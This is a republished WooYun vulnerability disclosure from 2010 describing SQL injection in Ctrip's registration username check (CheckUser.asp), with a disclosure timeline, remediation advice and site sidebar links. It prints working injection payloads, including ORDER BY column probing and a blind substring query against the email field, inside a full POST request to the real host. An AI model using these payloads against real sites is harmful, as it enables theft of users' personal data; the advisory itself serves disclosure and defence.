携程网某ajax验证存在sql注入
漏洞详情
披露状态:
2010-07-30: 细节已通知厂商并且等待厂商处理中
2010-07-30: 厂商已经确认,细节仅向厂商公开
2010-08-09: 细节向核心白帽子及相关领域专家公开
2010-08-19: 细节向普通白帽子公开
2010-08-29: 细节向实习白帽子公开
2010-08-29: 细节向公众公开
简要描述:
位置较敏感,发生在members表,可以发现表的一些字段,能够窃取任何人的包括email等信息,未深入测试
详细说明:
用户注册时,"验证用户是否存在"因过滤不严谨导致sql注入
另外:
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079''3
暴露了敏感信息
漏洞证明:
http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
尝试不正确的字段导致不同结果,输入".`"等字符及其它注入手段测试(可能存在ids)
-
POST /member/CheckUser.asp HTTP/1.1
-
Accept: */*
-
Accept-Language: en-US,zh-cn;q=0.5
-
Referer: http://www.ctrip.com/member/signup.asp
-
If-Modified-Since: Thu Jan 1 08:00:00 UTC 0800 1970
-
Content-Type: application/x-www-form-urlencoded
-
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
-
Host: www.ctrip.com
-
Content-Length: 94
-
Connection: Keep-Alive
-
Cache-Control: no-cache
-
Cookie:
-
signup_uid=jquery1'/*and*/and/**/sUbstRing(email,1,1)=char(0)/**/order/**/by/*and 1=1*/email--
修复方案:
1.白名单验证
2.屏蔽或友好提示错误
版权声明:转载请注明来源 路人甲@乌云
本篇文章来至:学新通
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通
- 本文地址: https://www.swvq.com/boutique/detail/tanhckejga
- 联系方式: luke.wu#vfv.cc
系列文章
更多
同类精品
更多
精彩评论
-
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
excel下拉菜单选择后怎么自动出现相应内容
PHP中文网 06-24 -
excel下划线不显示怎么办
PHP中文网 06-23 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
wphotoshop工具右键快捷工具不见了怎么办
PHP中文网 06-19 -
微信小程序没声音怎么办
PHP中文网 06-15 -
手机怎样打开html文件
PHP中文网 05-20 -
把文字添加蓝色阴影边框
PHP中文网 06-28 -
pr编辑工具栏面板不见了怎么办
PHP中文网 05-09